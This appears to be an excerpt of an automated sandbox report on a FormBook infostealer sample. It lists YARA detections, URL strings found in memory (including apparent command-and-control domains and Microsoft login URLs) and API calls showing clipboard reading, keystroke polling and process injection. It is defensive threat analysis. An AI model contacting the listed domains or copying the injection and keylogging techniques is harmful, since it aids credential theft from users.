            Source: cipher.exe, 00000004.00000002.4527269915.0000000005ED6000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003376000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: cipher.exe, 00000004.00000002.4527269915.0000000006B66000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000004006000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMY
            Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4527764176.00000000052C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.isrninjas.com
            Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4527764176.00000000052C7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.isrninjas.com/klk7/
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: cipher.exe, 00000004.00000002.4527269915.000000000651E000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.00000000039BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=expired
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: cipher.exe, 00000004.00000003.2413338446.00000000082BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Q
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: cipher.exe, 00000004.00000002.4520210070.0000000003605000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: cipher.exe, 00000004.00000002.4527269915.00000000069D4000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003E74000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://t2837.am-track.pl/redir.php?panel=Market_Listing&params=id%3D3940392%26utm_source%3Dmarket_r
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: cipher.exe, 00000004.00000002.4527269915.000000000638C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.000000000382C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.featurasandals.com/tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi
            Source: cipher.exe, 00000004.00000002.4527269915.0000000007340000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.00000000047E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fruitique.co.uk/2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy
            Source: cipher.exe, 00000004.00000003.2416202958.00000000082DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew/domain/botcsllc.com?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=expired
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F7425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00F7425A
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F74458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F74458
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F7425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00F7425A
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F60219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F60219
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F8CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: This is a third-party compiled AutoIt script.0_2_00F03B4C
            Source: PI No 20000814C.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_01cdad44-7
            Source: PI No 20000814C.exe, 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1cf8f811-4
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F03633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00F03633
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00F8C27C
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8C220 NtdllDialogWndProc_W,0_2_00F8C220
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00F8C49C
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00F8C788
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00F8C8EE
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8C86D SendMessageW,NtdllDialogWndProc_W,0_2_00F8C86D
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8CBF9 NtdllDialogWndProc_W,0_2_00F8CBF9
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8CBAE NtdllDialogWndProc_W,0_2_00F8CBAE
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8CB7F NtdllDialogWndProc_W,0_2_00F8CB7F
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8CB50 NtdllDialogWndProc_W,0_2_00F8CB50
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8CC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00F8CC2E
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F8CDAC
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8CD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00F8CD6C
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F01290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00F01290
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F01287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,74A3C8D0,NtdllDialogWndProc_W,0_2_00F01287
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F016DE GetParent,NtdllDialogWndProc_W,0_2_00F016DE
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8D6C6 NtdllDialogWndProc_W,0_2_00F8D6C6
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F016B5 NtdllDialogWndProc_W,0_2_00F016B5
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F0167D NtdllDialogWndProc_W,0_2_00F0167D
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00F8D74C
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F0189B NtdllDialogWndProc_W,0_2_00F0189B
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8DA9A NtdllDialogWndProc_W,0_2_00F8DA9A
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F8BF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00F8BF4D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0049AF03 NtClose,2_2_0049AF03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B60 NtClose,LdrInitializeThunk,2_2_02F72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_02F72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk,2_2_02F735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74340 NtSetContextThread,2_2_02F74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F74650 NtSuspendThread,2_2_02F74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AF0 NtWriteFile,2_2_02F72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AD0 NtReadFile,2_2_02F72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72AB0 NtWaitForSingleObject,2_2_02F72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BF0 NtAllocateVirtualMemory,2_2_02F72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BE0 NtQueryValueKey,2_2_02F72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72BA0 NtEnumerateValueKey,2_2_02F72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72B80 NtQueryInformationFile,2_2_02F72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EE0 NtQueueApcThread,2_2_02F72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72EA0 NtAdjustPrivilegesToken,2_2_02F72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E80 NtReadVirtualMemory,2_2_02F72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72E30 NtWriteVirtualMemory,2_2_02F72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FE0 NtCreateFile,2_2_02F72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FB0 NtResumeThread,2_2_02F72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72FA0 NtQuerySection,2_2_02F72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F90 NtProtectVirtualMemory,2_2_02F72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F60 NtCreateProcessEx,2_2_02F72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72F30 NtCreateSection,2_2_02F72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CF0 NtOpenProcess,2_2_02F72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CC0 NtQueryVirtualMemory,2_2_02F72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72CA0 NtQueryInformationToken,2_2_02F72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C70 NtFreeVirtualMemory,2_2_02F72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C60 NtCreateKey,2_2_02F72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72C00 NtQueryInformationProcess,2_2_02F72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DD0 NtDelayExecution,2_2_02F72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72DB0 NtEnumerateKey,2_2_02F72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D30 NtUnmapViewOfSection,2_2_02F72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D10 NtMapViewOfSection,2_2_02F72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72D00 NtSetInformationFile,2_2_02F72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73090 NtSetValueKey,2_2_02F73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73010 NtOpenDirectoryObject,2_2_02F73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F739B0 NtGetContextThread,2_2_02F739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D70 NtOpenThread,2_2_02F73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F73D10 NtOpenProcessToken,2_2_02F73D10
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A4650 NtSuspendThread,LdrInitializeThunk,4_2_053A4650
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A4340 NtSetContextThread,LdrInitializeThunk,4_2_053A4340
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_053A2D30
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_053A2D10
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_053A2DF0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2DD0 NtDelayExecution,LdrInitializeThunk,4_2_053A2DD0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_053A2C70
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2C60 NtCreateKey,LdrInitializeThunk,4_2_053A2C60
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_053A2CA0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2F30 NtCreateSection,LdrInitializeThunk,4_2_053A2F30
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2FB0 NtResumeThread,LdrInitializeThunk,4_2_053A2FB0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2FE0 NtCreateFile,LdrInitializeThunk,4_2_053A2FE0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_053A2E80
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_053A2EE0
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2B60 NtClose,LdrInitializeThunk,4_2_053A2B60
            Source: C:\Windows\SysWOW64\cipher.exeCode function: 4_2_053A2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_053A2BA0
